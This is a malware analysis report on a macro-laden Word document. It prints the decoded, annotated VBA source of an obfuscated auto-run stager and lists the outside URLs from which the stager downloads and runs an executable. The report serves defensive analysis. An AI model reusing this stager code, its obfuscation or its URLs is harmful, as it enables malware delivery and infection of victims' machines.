Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f102672d1eac888a…

MALICIOUS

Office (OLE)

68.4 KB Created: 2018-09-05 17:12:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: d2294df087c6c78286226c666b258f4c SHA-1: 390075fd6b701496854361ae0c6653c1f30328d9 SHA-256: f102672d1eac888af58585e5ae3dc4b120f3fc2d75617ad153f6b4307a67ee22
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_open macro that runs on document open and calls VBA.Shell with window style 0 (vbHide) on a command line assembled from the return values of several string-building functions. The visible fragments decode to `cmd /V:/C"set xEAW=...` followed by caret-obfuscated text that, read right-to-left, is a PowerShell loop over an '@'-separated URL list that calls `.DownloadFile(...)` into `$env:public\748.exe` and then `Invoke-Item` on it — a download-and-execute stager. The part of the macro that reverses the environment variable and hands it to PowerShell lies outside the extracted preview, so that final step is inferred rather than observed. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' is consistent with a downloader; the payload family is not established by static analysis alone and should be confirmed by detonating the sample or fetching the second stage in a controlled environment.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. In this sample the only extracted URL is the standard DrawingML schema namespace, which is benign OOXML boilerplate and not an indicator of compromise; the actual download URLs are caret-obfuscated and byte-reversed inside the macro's string fragments and are therefore not surfaced by this heuristic. Recover them by deobfuscating the macro (e.g. olevba --deobf or macro emulation) rather than relying on this list.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5594 bytes
SHA-256: cca52866c0689dd623ddfc81e0aea21333f06370c8afdfc5be9d3c29ee6402d6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SiIdjLsHAK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execute entry point: Word runs this when the document is opened
' (T1204.002 Malicious File -> T1059.005 Visual Basic).
Private Sub Document_open()
' Blanket error suppression: the bogus Hour() calls below raise type-mismatch
' errors that are silently discarded, and any failure of the Shell() call is
' hidden from the user as well.
On _
Error _
Resume _
Next
   ' Padding/noise: Hour() expects a time value; a random string cannot be
   ' converted, so this errors out and is skipped by On Error Resume Next.
   Hour "uuSuaQKZE" + "BncbMW"
' The command line is built at run time from the string-building functions in
' the other module (PpnsEQXZqY, AGVQCKssFIj, IUBNOzj, ...) and executed via
' Shell. Window style 49 - 49 = 0 = vbHide, so no console window is shown.
' hDi is not defined anywhere in the visible listing (probably an empty or
' undeclared variable that CleanString() turns into "" — confirm); the other
' names not shown here are in the truncated part of the macro.
VBA.Shell CleanString(hDi) + zwTmzzLdznFhwK + uTFraNSZM + PpnsEQXZqY + AGVQCKssFIj + IUBNOzj + KkpCvlwSvGiM + AEAWtQMYWmkcSW, 49 - 49
   ' More padding; same no-op behaviour as above.
   Hour "tab" + "Bs"
End Sub



Attribute VB_Name = "JwzrkHQGizaJ"
' Returns the first segment of the Shell command line. It opens a cmd.exe
' wrapper (`cmd /V:/C"set xEAW=`) and then appends caret-obfuscated text.
' `^` is the cmd.exe escape character and is dropped by the interpreter; once
' the carets are stripped and the text is read right-to-left it is the TAIL of
' a PowerShell download-and-execute loop (decoded fragments are noted per
' assignment below; hand-decoded from the visible strings — verify with a
' deobfuscator or emulator before acting on them). The Hour "..." statements
' are junk: they raise type-mismatch errors swallowed by On Error Resume Next.
Function PpnsEQXZqY()

On _
Error _
Resume _
Next
Hour "ZMkz" + "2926" + "oncE" + "r"
   Hour "jjiqE" + "nspO"
   Hour "3588" + "tPzWXfm" + "l" + "zfbImra"
   Hour "28974550" + "Hr"
   Hour "ShbXJz" + "9282" + "ncm" + "sj"
' Chr(1+1+0+3+29) = Chr(34) = a double quote. Carets stripped this reads:
'   cmd /V:/C"set xEAW=   (followed by a run of spaces)
uVOiE = "cmd /V^" + ":/" + "C" + Chr(1 + 1 + 0 + 3 + 29) + "s^e^" + "t ^x" + "^EA^" + "W=  ^ ^" + " ^ ^  ^"
Hour "OnjwGnTms" + "368963570"
   Hour "USQpkd" + "H" + "j" + "153240969"
   Hour "250687502" + "355239414" + "VzrIQkdUKw" + "vHF"
   Hour "168294423" + "tRlKDFJdBiuZiN"
' Stripped: `}}{hctac};k`  -> reversed: `k;}catch{}}` (end of the PS script)
RqNHfs = " ^" + "  ^ ^ ^" + " ^" + " ^" + "  ^ ^" + "}^}^{hc" + "t^ac" + "^}" + "^;k^"
Hour "sYqGoZVHdiPnNH" + "3576"
   Hour "EpwKmapp" + "309738681" + "160283557" + "N"
' Stripped: `aerb;dPH$ metI-ekovnI;)dPH$ ,`
'   -> reversed: `, $HPd);Invoke-Item $HPd;brea`  (runs the dropped file)
CjWudFLBi = "a^" + "erb;dP" + "H$ m^et" + "^I-^" + "e^k^ovn" + "^I;)" + "^d^" + "P" + "H^$ ,"
Hour "1816" + "3466"
   Hour "UKR" + "BwaKFcW"
   Hour "74348632" + "Wii"
   Hour "2798" + "J" + "Sq" + "SXqoABXWSRw"
' Stripped: `bjE$(eliFdaolnwoD.qNl${yrt`
'   -> reversed: `try{$lNq.DownloadFile($Ejb`  (download each URL in turn)
jcPPirVHTA = "b^j^" + "E" + "^" + "$(^e^" + "l^i" + "^F^" + "d^a^o^l" + "n^w^oD^" + ".qN" + "l^$^{" + "^yr^" + "t^"
Hour "7029" + "jzZ"
   Hour "iiMo" + "302280330"
   Hour "zIrPjAoIqsz" + "IfAK"
   Hour "8058" + "371660783" + "ZDWPdNuU" + "PsqZtjNsV"
   Hour "6364" + "IQN" + "531461288" + "jwKFziPj"
' Stripped: `{)Fjb$ ni bjE$(hcaerof;`
'   -> reversed: `;foreach($Ejb in $bjF){`  (iterate the URL list)
Xziwl = "{)^F^" + "j^b" + "^$" + " n" + "i^" + " b^jE$(" + "^hc^" + "aero" + "^f^;"
Hour "OoZj" + "FkSp" + "Si" + "21463231"
   Hour "OU" + "PATDjvm"
   Hour "473416726" + "cJqqhf" + "EdGE" + "tjTuzwIrz"
   Hour "206375660" + "8193"
' Stripped: `'exe.'+wqA$+'\'+c`
'   -> reversed: `c+'\'+$Aqw+'.exe'`  (tail of the drop path)
nLcdHR = "'^" + "exe" + "^" + ".^'" + "+" + "w^q^A" + "^" + "$^+^'" + "^\^" + "'^+c"
Hour "J" + "ziohCpcBIv" + "zto" + "bb"
   Hour "5165" + "ERZ" + "7124" + "7860"
   Hour "5733" + "PsV"
   Hour "297799450" + "325220545" + "lG" + "DZZ"
' Stripped: `ilbup:vne$=dPH$;'847' = wqA$;)'`
'   -> reversed: `');$Aqw = '748';$HPd=$env:publi`
' Together with nLcdHR the drop path is $env:public\748.exe.
WkhWkNwr = "il^b^u^" + "p:vne" + "^$=d^PH" + "$;'^84^" + "7'^ ^=" + "^ ^wqA" + "^$;)'"
' Forward order: cmd prefix, then the PS fragments from last to first, so the
' PowerShell reads correctly only after the whole value is reversed.
PpnsEQXZqY = uVOiE + RqNHfs + CjWudFLBi + jcPPirVHTA + Xziwl + nLcdHR + WkhWkNwr
   Hour "YJCZzTBQ" + "VdXc" + "7470" + "7750"
   Hour "270882754" + "wDQz"
   Hour "V" + "4266" + "2836" + "QkfH"
   Hour "OIUdd" + "Ff" + "DsSD" + "r"
End Function
' Returns the second segment of the Shell command line: the '@'-separated list
' of download URLs that the PowerShell loop in PpnsEQXZqY iterates over. Same
' obfuscation as the other function — cmd.exe carets to be stripped, then the
' whole value is read right-to-left. Reversed, the five fragments join into:
'   ...rimavera.it/4LmlHpS@http://tabloid.id/iKZ9NWTm4V@http://enet.cm/ZGWLBkF8F
'   @http://dev.pacificsympmosium.org/UKZvz1aj@http://outsourcingpros.com/n4Gi3D31d8'.Split('@
' The scheme/host prefix of the first URL comes from IUBNOzj (truncated in the
' preview). Hand-decoded from the visible strings — treat as candidate IOCs and
' confirm with a deobfuscator/emulator or a sandbox run before blocking.
' Hour "..." statements are no-op junk (errors swallowed by On Error Resume Next).
Function AGVQCKssFIj()

On _
Error _
Resume _
Next
Hour "WFA" + "FBDORLnfsIjkfa" + "lziS" + "SJPGkC"
   Hour "Qs" + "WzkszfKuT" + "ZpkBb" + "105129519"
   Hour "CjT" + "205108452"
   Hour "9459" + "QldfrzZ" + "7697" + "4350"
' Stripped: `@'(tilpS.'8d13D3iG4n/moc.sorpgnicruostuo//:pt`
'   -> reversed: `tp://outsourcingpros.com/n4Gi3D31d8'.Split('@`
dtRmmbaFF = "@'(^" + "t^i^lpS" + ".^'" + "^8d^13" + "^D3i" + "G4n/mo" + "c^.^s" + "^or" + "p^gn^" + "icru" + "^os^tu" + "^o" + "//:p^t"
Hour "XJYsnrmXfwlwd" + "fO"
   Hour "4524" + "H"
   Hour "F" + "T"
' Stripped: `th@ja1zvZKU/gro.muisopmyscific`
'   -> reversed: `cificsympmosium.org/UKZvz1aj@ht`  (supplies the "ht" of the URL above)
wimjjEoirr = "^th@j" + "^a^1zvZ" + "K^U/" + "^" + "gr^" + "o^.^m" + "^" + "u^i" + "so^" + "p^my^" + "sc^i^f^" + "ic"
Hour "l" + "278774964"
   Hour "311778797" + "5084"
   Hour "DnYArHmw" + "UjvSwpRmi"
   Hour "t" + "25240542"
   Hour "4289" + "XFbNzwiqfXAXw" + "tUU" + "Wubth"
' Stripped: `ap.ved//:ptth@F8FkBLWGZ`
'   -> reversed: `ZGWLBkF8F@http://dev.pa`  (host continues in wimjjEoirr)
kOLHVYZ = "a" + "^p" + ".ved/" + "/:^p" + "^tt^h@" + "F8^" + "F^k" + "^BL" + "WG^Z"
Hour "HuJYLYOARiXo" + "417210530"
   Hour "IFqo" + "OZ"
' Stripped: `/mc.tene//:ptth@V4mTWN9ZKi/di.dio`
'   -> reversed: `oid.id/iKZ9NWTm4V@http://enet.cm/`
rwMFVaBQZXW = "/mc" + "^.t^e" + "ne" + "//^:pt" + "th@V4" + "mTWN9" + "Z^K" + "^i/^di." + "di^o"
Hour "4168" + "5105"
   Hour "Y" + "f"
   Hour "6180" + "6491" + "oKZZzvtP" + "500808604"
   Hour "XzdqJHv" + "j"
' Stripped: `lbat//:ptth@SpHlmL4/ti.arevamir`
'   -> reversed: `rimavera.it/4LmlHpS@http://tabl`  ("tabl" + "oid.id" above)
YAAJjrm = "^l" + "^b" + "a^t" + "//:p^" + "tth^@^S" + "^" + "p" + "H^lm^L" + "^4/ti" + ".a" + "rev^am" + "^i" + "r^"
' Forward concatenation; only meaningful once the complete value is reversed.
AGVQCKssFIj = dtRmmbaFF + wimjjEoirr + kOLHVYZ + rwMFVaBQZXW + YAAJjrm
   Hour "Q" + "4667"
   Hour "372778731" + "219862146" + "tzRDdwAK" + "hYcTwOXBPqOJj"
   Hour "aaDRG" + "290404369"
   Hour "fahsQ" + "bUpqZ"
End Function
Function IUBNOzj()

On _
Error _
Resume
... (truncated)